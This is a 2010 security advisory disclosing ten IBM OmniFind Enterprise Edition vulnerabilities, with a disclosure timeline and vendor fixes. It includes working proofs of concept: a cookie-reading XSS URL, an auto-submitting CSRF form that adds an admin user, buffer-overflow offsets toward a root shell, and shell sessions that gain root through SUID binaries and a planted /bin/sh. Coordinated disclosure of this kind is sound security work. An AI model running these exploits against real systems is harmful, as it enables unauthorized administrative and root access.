============================================
||| Security Advisory |||
||| CVE-2010-3890 (CVE candidate) |||
||| CVE-2010-3891 (CVE candidate) |||
||| CVE-2010-3892 (CVE candidate) |||
||| CVE-2010-3893 (CVE candidate) |||
||| CVE-2010-3894 (CVE candidate) |||
||| CVE-2010-3895 (CVE candidate) |||
||| CVE-2010-3896 (CVE candidate) |||
||| CVE-2010-3897 (CVE candidate) |||
||| CVE-2010-3898 (CVE candidate) |||
||| CVE-2010-3899 (CVE candidate) |||
============================================
IBM OmniFind several issues
===========================
Date released: 11/2010
Date reported: 04/2009
by Fatih Kilic
Fraunhofer Institute for Secure Information Technology
fatih.kilic (at) sit.fraunhofer (dot) de [email concealed]
http://security.fatihkilic.de/advisory/fkilic-sa-2010-ibm-omnifind.txt
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3890
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3891
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3892
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3893
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3894
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3895
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3896
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3897
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3898
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3899
Vendor: IBM
Product: IBM OmniFind Enterprise Edition
Website: http://www-01.ibm.com/software/data/enterprise-search/omnifind-enterpris
e/
Vulnerabilities:
- Cross-Site-Scripting (XSS)
- Cross-Site-Request-Forgery (XSRF)
- Session fixation
- Session impersonation
- Remote buffer overflow
- Privilege escalation in two applications
- Missing authentication in configuration panel
- Admin password is delivered in plaintext inside the server response
- Cookies are set for root path, not application path
- Crawler endless loop
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
Background:
Quoting http://www-01.ibm.com/software/data/enterprise-search/omnifind-enterpris
e/:
| IBM(R) OmniFind(tm) Enterprise Edition drives users to the information that matters
through knowledge driven search.
|
| It??s designed to drive users to the knowledge they seek and enhance the visibility
of content and context of your organization's unstructured information.
|
| * Dynamic - delivers complete dynamic facet capabilities, type-ahead search,
real-time content alerting, is reactive to search-led content exploration
| * Tailorable - delivers business adjustable relevancy and UIMA standardization
for entity identification and tuned semantic searching
| * Supportable - delivers search on 20+ platform, connects to 30+ repositories
| * Secure - delivers enforced security across content repositories
| * Scalable - lucene-based index for enterprise level scalability
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
Overview:
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
Technical details:
* Cross-Site-Scripting (XSS) (CVE-2010-3890)
The GET parameter »command« used inside the administration interface is
embedded directly into the HTML source without any input validation or
output sanitization. Using this parameter the attacker can inject arbitrary
Javascript code which will be run in the session context of other users.
As session credentials are stored within cookies, an attacker can steal
the cookie information and impersonate (CVE-2010-3893) the session and
control the web application within the browser context of the victim.
Exploit to show cookies:
http://omnifind-host/ESAdmin/collection.do?command=<script>alert(documen
t.
cookie);</script>
* Cross-Site-Request-Forgery (XSRF) (CVE-2010-3891)
The forms in the administrator interface are not protected against XSRF. The
attacker can do any action in the context of the victim.
An example attack scenario could be:
The attacker creates a malicious website with a prepared form to add a new
user, which will be submitted on load.
Exploit to add an admin user:
<html>
<head><title>Some seemingly benign web-site</title></head>
<body onLoad="document.forms[0].submit();">
<form method="post"
action="http://omnifind-host/ESAdmin/security.do">
<input type="hidden" name="command" value="saveNewUser"/>
<input type="hidden" name="user.name" value="joemueller"/>
<input type="hidden" name="user.role" value="0"/>
<input type="hidden" name="user.allCollections" value="true"/>
<input type="hidden" name="apply" value="OK"/>
</form>
</body>
</html>
Solution: Fixed in release v9.1 of Omnifind.
* Session fixation (CVE-2010-3892)
The login form of the administrator interface is vulnerable to session fixation
attacks. And attacker can use a prepared website or a XSS vulnerability (CVE-2010-3890)
to change session ID (SID) of the login form. The SID have to be generated by the
server. An attacker can visit the login interface and take the generated value and use
this for the attack. After a valid authentication of the victim with the attacker SID,
the attacker can do any action in the context of the administrator.
* Session impersonation (CVE-2010-3893)
The session ID (SID) is the only form of user authentication after the login and it
is not bound to an IP address. By reading the cookies of the victim, e.g. using an
XSS attack (CVE-2010-3890), the whole session can be hijacked and the attacker can
do any action in the context of the administrator from any computer that can reach
the administrator interface.
* Remote buffer overflow (CVE-2010-3894)
The administration interface has a login form with an username- and a passwordfield.
Entering a valid username (default value is »esadmin«) and a very long string into
the password field a buffer overflow is triggered.
The function Java_com_ibm_es_oss_CryptionNative_ESEncrypt() defined in the file
/opt/IBM/es/lib/libffq.cryptionjni.so is copying the password value to a fixed size
buffer of 2048 bytes.
There are two attack points to exploit this buffer overflow.
The first attack is based on the following buffer combination
password = 2080 bytes + firstattackpoint EAX+EDI (4 bytes)
The inserted value for »firstattackpoint« will be used in the registers EAX and EDI.
These registers are used to write data into. This means you can insert any arbitrary
address, where you want to write to.
The second attack is overwriting the saved return address and has the following layout.
password = 2080 bytes + firstattackpoint EAX+EDI (4 bytes) + 480 bytes + EDX (4 bytes)
+ EAX (4 bytes) + EIP (4 bytes)
To reach the return to your overwritten instruction pointer, you have to insert a valid
writeable address as firstattackpoint. This second attack has some restrictions, you
can only use printable ASCII values. Non printable characters will be removed from the
input string.
This is no real barrier, since the code is big enough to have many jmp/call addresses,
which have printable ASCII values in their addresses.
During the overwrite the register ESI is pointing to your input, so you could use a
call *%esi to jump to your ASCII filtered shellcode.
During the first attackpoint your input is unfiltered, you can insert arbitrary values.
If you combine both attacks together, you can exploit it remotely and get a (root) shell.
Default running user is root :)
* Privilege escalation in two applications (CVE-2010-3895)
Root SUID bits are set for the applications »esRunCommand« and »estaskwrapper«.
------------------------------------------------------------------------
-
-rwsr-xr-x 1 root users ... /opt/IBM/es/bin/esRunCommand
-rwsr-xr-x 1 root users ... /opt/IBM/es/bin/estaskwrapper
------------------------------------------------------------------------
-
»esRunCommand« takes one argument and runs it as root. See example below.
------------------------------------------------------------------------
-
-rwsr-xr-x 1 root users ... /opt/IBM/es/bin/esRunCommand
joemueller@XXX:/opt/IBM/es/bin> ./esRunCommand id
OUTPUT: cmd is id
id
uid=0(root) gid=100(users) Gruppen=16(dialout),33(video),100(users)
------------------------------------------------------------------------
-
The application »estaskwrapper« is meant to start the application »estasklight«.
The pseudo c code looks like this:
------------------------------------------------------------------------
-
main() {
int auth = 0;
...
if (argv[1] == "estasklight") {
auth = 1;
...
path = getenv("ES_LIBRARY_PATH");
if (path) {
setenv("LD_LIBRARY_PATH", path);
setenv("LIBPATH", path);
...
if (auth) {
execvp ("estasklight", args);
}
...
}
...
}
...
}
------------------------------------------------------------------------
-
Explanation of the code:
»argv[1]« is the first command line argument, that is compared with the string
»estasklight«. If it is equal the »auth« flag is set.
If the user has the environment variable »ES_LIBRARY_PATH« set, the value is
copied to two new environment variables »LD_LIBRARY_PATH« and »LIBPATH«.
If the »auth« flag is set, the application »estasklight« is executed.
Exploit for running /bin/sh
------------------------------------------------------------------------
-
joemueller@XXX:~> cp /bin/sh ~/bin/estasklight
joemueller@XXX:~> export ES_LIBRARY_PATH=/home/joemueller
joemueller@XXX:~> export PATH=/home/joemueller/bin:$PATH
joemueller@XXX:~> /opt/IBM/es/bin/estaskwrapper estasklight
XXX:~# id
uid=0(root) gid=100(users) Gruppen=16(dialout),33(video),100(users)
------------------------------------------------------------------------
-
* Missing authentication in configuration panel (CVE-2010-3896)
All pages below the the path »http://omnifind-host/ESSearchApplication/« are reachable
without any authentication. The server configurations page is located inside this
directory at »http://omnifind-host/ESSearchApplication/palette.do«. An attacker can
change the server configuration without authenticating himself against the application.
* Admin password is delivered in plaintext inside the server response (CVE-2010-3897)
The administrator password is embedded as value inside the HTML form at
»http://omnifind-host/ESSearchApplication/palette.do« and is transmitted in plaintext
over HTTP. An attacker with access to this page, for example obtained by another bug
like
»missing authentication« (CVE-2010-3896) or »session impersonation« (CVE-2010-3893),
can use this password as a backdoor to the system.
* Cookies are set for root path, not application path (CVE-2010-3898)
The cookies are not restricted to the »ESAdmin« path, they are set for the domain
root path. Every page inside the same domain, even from other directories, can access
the administrator cookies and steal the session ID, which are used for authentication.
* Crawler endless loop (CVE-2010-3899)
The crawler has no recursion depth limit. A site with dynamic parameter manipulation can
cause an endless loop. This loop will block the crawler thread and use permanent server
resources. Too many blocks can lead to a denial of service. The same site will be
indexed more times and the search results will display the same site many times. This
can be abused for spamming the search results.
Exploit to test the endless loop:
/* loop.php */
<?php
$numb = rand();
echo $numb.'<br><a href="loop.php?value='.$numb.'">click me</a>';
?>
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
Timeline:
* 04/2009: Vulnerability reported to IBM
* 05/2009: Response from IBM with a timeline of security updates
* 07/2010: Coordinating public release of advisory
* 11/2010: Public release of advisory
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
Solution:
A fix for the buffer overflow (CVE-2010-3894) was provided in Omnifind v8.5 Fixpack 6:
https://www-304.ibm.com/jct01003c/support/docview.wss?rs=3278&context=SS
5SQ7&uid=swg24027159&loc=en_US&cs=utf-8Ω=en
Cross-Site-Scripting (CVE-2010-3890) and Privilege escalation in two applications
(CVE-2010-3895)
are fixed in release v9.1 of Omnifind.
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
Credits:
- Fatih Kilic, Fraunhofer SIT (discovery)